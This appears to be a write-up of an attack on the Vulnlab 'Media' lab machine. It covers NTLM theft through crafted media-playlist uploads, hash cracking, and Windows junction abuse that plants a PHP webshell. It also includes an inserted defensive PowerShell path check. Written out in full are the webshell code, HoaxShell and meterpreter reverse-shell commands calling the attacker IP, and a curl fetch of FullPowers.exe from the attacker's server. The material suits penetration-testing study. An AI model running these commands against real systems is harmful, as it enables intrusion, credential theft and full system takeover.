VL-Media

Vulnlab Media: Windows Media Player NTLM Theft and Junction Folder Exploitation Walkthrough

This detailed Vulnlab penetration testing walkthrough demonstrates how I successfully compromised a Windows media server through a creative combination of attack vectors. Beginning with reconnaissance that revealed a vulnerable file upload functionality in a web application specifically requesting “Windows Media Player compatible” files, I leveraged NTLM theft techniques by crafting malicious media files (.wax and .asx) to capture and crack the user’s credentials. After gaining initial SSH access, I discovered an automated script that processes uploaded files, which led to identifying a critical path traversal vulnerability using Windows junction points. By redirecting the upload path to the web server’s document root, I deployed a PHP webshell that provided remote code execution capabilities. The privilege escalation phase involved restoring SeImpersonate privileges with FullPowers and ultimately achieving SYSTEM-level access. This technical guide illustrates advanced Windows exploitation techniques including symbolic link abuse, service account manipulation, and privilege escalation methods essential for thorough penetration testing of Windows environments.

Initial Reconnaissance

Initial port scan revealed the following open ports:

PORT     STATE SERVICE        REASON           VERSION
22/tcp   open  ssh            syn-ack ttl 127  OpenSSH
80/tcp   open  http           syn-ack ttl 127  Apache httpd
3389/tcp open  ms-wbt-server  syn-ack ttl 127  Microsoft Terminal Services

[Screenshot: Windows Media Player upload interface]

Initial Access

The target website featured an upload function requesting a “brief introduction video (compatible with Windows Media Player)”. This presented an opportunity to leverage NTLM hash theft.

NTLM Theft Technique

Using ntlm_theft to create malicious media files:

- .wax - via Windows Media Player playlist (Better, primary open)
- .asx - via Windows Media Player playlist (Better, primary open)
- .m3u - via Windows Media Player playlist (Worse, Win10 opens first in Groovy)

I uploaded a .wax or .asx file to the target and set up Responder to capture the NTLM hash:

sudo responder -I tun0 -dwv

[Screenshot: NTLM hash captured]

Password Cracking

Once I captured the hash, I used hashcat to crack it:

hashcat hash6969.txt /usr/share/wordlists/rockyou.txt

[Screenshot: Cracked hash]

Credentials obtained:

  • Username: ENOX
  • Password: <>

System Access

With the credentials, I established an SSH connection:

ssh enox@10.10.109.139

Privilege Escalation Research

Upon accessing the system, I discovered a PowerShell script that revealed key information about the system’s operation:

enox@MEDIA C:\Users\enox\Documents>type review.ps1
function Get-Values {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Read the first line of the file
    $firstLine = Get-Content $FilePath -TotalCount 1

    # Extract the values from the first line
    if ($firstLine -match 'Filename: (.+), Random Variable: (.+)') {
        $filename = $Matches[1]
        $randomVariable = $Matches[2]

        # Create a custom object with the extracted values
        $repoValues = [PSCustomObject]@{
            FileName = $filename
            RandomVariable = $randomVariable
        }

        # Return the custom object
        return $repoValues
    }
    else {
        # Return $null if the pattern is not found
        return $null
    }
}

function UpdateTodo {
    param (
        [Parameter(Mandatory = $true)]
        [ValidateScript({Test-Path -Path $_ -PathType Leaf})]
        [string]$FilePath
    )

    # Create a .NET stream reader and writer
    $reader = [System.IO.StreamReader]::new($FilePath)
    $writer = [System.IO.StreamWriter]::new($FilePath + ".tmp")

    # Read the first line and ignore it
    $reader.ReadLine() | Out-Null

    # Copy the remaining lines to a temporary file
    while (-not $reader.EndOfStream) {
        $line = $reader.ReadLine()
        $writer.WriteLine($line)
    }

    # Close the reader and writer
    $reader.Close()
    $writer.Close()

    # Replace the original file with the temporary file
    Remove-Item $FilePath
    Rename-Item -Path ($FilePath + ".tmp") -NewName $FilePath
}

$todofile="C:\\Windows\\Tasks\\Uploads\\todo.txt"
$mediaPlayerPath = "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"


while($True){

    if ((Get-Content -Path $todofile) -eq $null) {
        Write-Host "Todo is empty."
        Sleep 60 # Sleep for 60 seconds before rechecking
    }
    else {
        $result = Get-Values -FilePath $todofile
        $filename = $result.FileName
        $randomVariable = $result.RandomVariable
        Write-Host "FileName: $filename"
        Write-Host "Random Variable: $randomVariable"

        # Opening the File in Windows Media Player
        Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\uploads\$randomVariable\$filename"

        # Wait for 15 seconds
        Start-Sleep -Seconds 15

        $mediaPlayerProcess = Get-Process -Name "wmplayer" -ErrorAction SilentlyContinue
        if ($mediaPlayerProcess -ne $null) {
            Write-Host "Killing Windows Media Player process."
            Stop-Process -Name "wmplayer" -Force
        }

        # Task Done
        UpdateTodo -FilePath $todofile # Updating C:\Windows\Tasks\Uploads\todo.txt
        Sleep 15
    }

}

Path Traversal Exploitation

I discovered a junction abuse vulnerability in the C:\Windows\Tasks\Uploads\ directory. The web application stores each upload in a subfolder named with the MD5 hash of the first name, last name and email address submitted with it (concatenated as “firstnamelastnameemail”), and review.ps1 then opens the file from that subfolder. Because enox can delete and recreate folders under Uploads, that subfolder can be replaced with a junction, so the next upload with the same details is written wherever the junction points.
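As the defender's counterpart to the junction abuse above, here is an added hardening check (my example, not part of the machine's review.ps1) that the processing loop could call before handing a path to wmplayer: it requires the per-upload folder name to be an MD5 hex digest, the file name to be a single path component, and both the folder and the file to be plain filesystem entries (no junction or symlink) whose normalized path stays under the Uploads root. The function name Test-SafeUploadPath and its parameter names are my own.

```powershell
# Added hardening example, not part of the original review.ps1.
# Returns $true only when Uploads\<RandomVariable>\<FileName> is a plain file inside a
# plain directory under $UploadsRoot, so a junction planted at Uploads\<md5> (as in the
# walkthrough) makes the loop skip the entry instead of following it.
function Test-SafeUploadPath {
    param (
        [Parameter(Mandatory = $true)][string]$UploadsRoot,     # e.g. C:\Windows\Tasks\Uploads
        [Parameter(Mandatory = $true)][string]$RandomVariable,  # folder name taken from todo.txt
        [Parameter(Mandatory = $true)][string]$FileName         # file name taken from todo.txt
    )

    # The folder name is generated as an MD5 digest, so anything else is tampering.
    if ($RandomVariable -notmatch '^[0-9a-fA-F]{32}$') { return $false }

    # The file name must be a single component: no separators, no drive colon, no '.'/'..'.
    if ($FileName -match '[\\/:]' -or $FileName -in @('.', '..')) { return $false }

    $root   = [System.IO.Path]::GetFullPath($UploadsRoot).TrimEnd('\') + '\'
    $folder = Join-Path -Path $root -ChildPath $RandomVariable
    $file   = Join-Path -Path $folder -ChildPath $FileName

    # -Force returns the entry itself rather than its target; a junction or symlink
    # carries the ReparsePoint attribute, so reject it at either level.
    foreach ($path in @($folder, $file)) {
        $item = Get-Item -LiteralPath $path -Force -ErrorAction SilentlyContinue
        if ($null -eq $item) { return $false }
        if ([int]($item.Attributes -band [System.IO.FileAttributes]::ReparsePoint) -ne 0) { return $false }
    }
    if (-not (Test-Path -LiteralPath $folder -PathType Container)) { return $false }

    # Normalize and confirm the final path is still inside the Uploads root.
    $full = [System.IO.Path]::GetFullPath($file)
    return $full.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)
}

# How the processing loop would use it, in place of the unconditional Start-Process:
# if (Test-SafeUploadPath -UploadsRoot 'C:\Windows\Tasks\Uploads' -RandomVariable $randomVariable -FileName $filename) {
#     Start-Process -FilePath $mediaPlayerPath -ArgumentList "C:\Windows\Tasks\Uploads\$randomVariable\$filename"
# } else {
#     Write-Warning "Skipping suspicious todo entry: $randomVariable\$filename"
# }
```

The check narrows the window but does not close it: the folder can still be swapped between the check and Start-Process, so the structural fix is that the account running review.ps1 must not process a directory that the SSH user can delete and recreate.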

Creating a Webshell

First, I created a simple PHP webshell:

<?php
system($_REQUEST['cmd']);
?>

I then calculated the MD5 hash that would be created:

echo -n "carlitocarlitocarlito@media.vl" | md5sum
3aab4336940e9c82d5ef05bf40d58b52 -

[Screenshot: File created]

After verifying the hash calculation worked correctly, I deleted the folder and created a junction pointing to C:\xampp\htdocs:

rmdir C:\Windows\Tasks\Uploads\3aab4336940e9c82d5ef05bf40d58b52
mklink /J C:\Windows\Tasks\Uploads\3aab4336940e9c82d5ef05bf40d58b52 C:\xampp\htdocs

After re-uploading the file, the webshell appeared in C:\xampp\htdocs:

[Screenshot: Shell in website]

Gaining System Access

I created a HoaxShell session and executed the command it generated through the webshell:

hoaxshell -s 10.8.5.195 -p 4444

/phpshell.php?cmd=powershell -e ......

[Screenshot: HoaxShell connection]

I noticed the shell was running as the Local Service account but without SeImpersonatePrivilege. To restore the account's default privileges, I used FullPowers, served from my machine and fetched from the target:

# on the attacking machine
python3 -m http.server 80
# on the target
curl http://10.8.5.195/FullPowers.exe -o FS.exe

I then created another HoaxShell and executed FullPowers:

./FS.exe -c "powershell -e .....

[Screenshot: SeImpersonatePrivilege restored]

Privilege Escalation to SYSTEM

To escalate to SYSTEM, I used the Meterpreter getsystem command (alternatively, any potato exploit would work):

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.8.5.195 LPORT=9091 -f exe -o shell2.exe

Started Metasploit console and set up a matching handler:

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 10.8.5.195
set lport 9091
run

After the Meterpreter session connected back, I simply ran:

getsystem

[Screenshot: SYSTEM shell]

https://api.vulnlab.com/api/v1/share?id=396c14c2-aa9d-46a2-a792-68ceea4b179c